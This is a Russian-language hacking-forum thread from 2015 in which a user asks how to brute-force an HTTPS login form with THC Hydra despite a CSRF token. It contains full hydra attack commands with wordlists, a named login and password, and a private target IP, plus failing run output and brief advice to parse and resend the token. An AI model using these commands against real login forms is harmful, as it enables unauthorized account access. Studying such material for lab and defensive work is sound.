Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   hydra & CRSF (https://forum.antichat.xyz/showthread.php?t=431494)

user6334 13.10.2015 16:18
Не получается у меня брутить веб-форму по https. Выдает ошибку подключения. Почитал здесь: https://github.com/vanhauser-thc/thc-hydra/issues/40 , и пришел к выводу, что это CRSF-токен мешает. Какие есть способы это обойти? Помогите!

faza02 13.10.2015 16:49
спарсить токен, отправить вместе с ним

user6334 13.10.2015 17:05
а можно поподробнее? каким образом токен передается? В куки? А как команду для гидры написать, чтобы она куки передавала?

faza02 13.10.2015 18:46
вряд ли, но зависит от реализации. в гидре - не знаю, самописным софтом запросто

user6334 14.10.2015 07:13
hydra -s 443 -L users.txt -P pass.txt -e nsr 10.10.1.10 http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Lo gin:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=k73vfi85vvna3mchopebmcgc43"

Может так?

faza02 14.10.2015 11:27
я, честно, еще пока даже не уверен, что проблема из-за CSRF токена. покажите полный и нормальный отснифанный запрос

user6334 14.10.2015 13:13
Может, и не из-за токена

master@limimate ~/hydra-8.1 $ hydra -l nichenkoOV -p vfvfjkz -f -V 192.168.247.198 https-post-form "/index.php?login=yes:AUTH_FORM=Y&TYPE=AUTH&USER_LOGIN=^USER^ &USER_PASSWORD=^PASS^:Неправильный логин или пароль" -s 443

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-10-14 12:10:55

[DATA] max 1 task per 1 server, overall 64 tasks, 1 login try (l:1/p:1), ~0 tries per task

[DATA] attacking service http-post-form on port 443 with SSL

[ATTEMPT] target 192.168.247.198 - login "nichenkoOV" - pass "vfvfjkz" - 1 of 1 [child 0]

[ERROR] Child with pid 631 terminating, cannot connect

[RE-ATTEMPT] target 192.168.247.198 - login "nichenkoOV" - pass "vfvfjkz" - 1 of 1 [child 0]

[ERROR] Child with pid 632 terminating, cannot connect

[RE-ATTEMPT] target 192.168.247.198 - login "nichenkoOV" - pass "vfvfjkz" - 1 of 1 [child 0]

[ERROR] Child with pid 633 terminating, cannot connect

[STATUS] attack finished for 192.168.247.198 (waiting for children to finish) ...

1 of 1 target completed, 0 valid passwords found

Hydra (http://www.thc.org/thc-hydra) finished at 2015-10-14 12:10:55

faza02 14.10.2015 13:21
Запрос, а не настройку для гидры.

user6334 14.10.2015 15:13
Запрос? Вот хост: 192.168.247.198:443/index.php?login=yes

Вот POST: AUTH_FORM=Y&TYPE=AUTH&USER_LOGIN=USER&USER_PASSWOR D=PASS

что еще нужно?

faza02 14.10.2015 15:25
И где тут участвует CSRF токен?


Время: 20:08
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице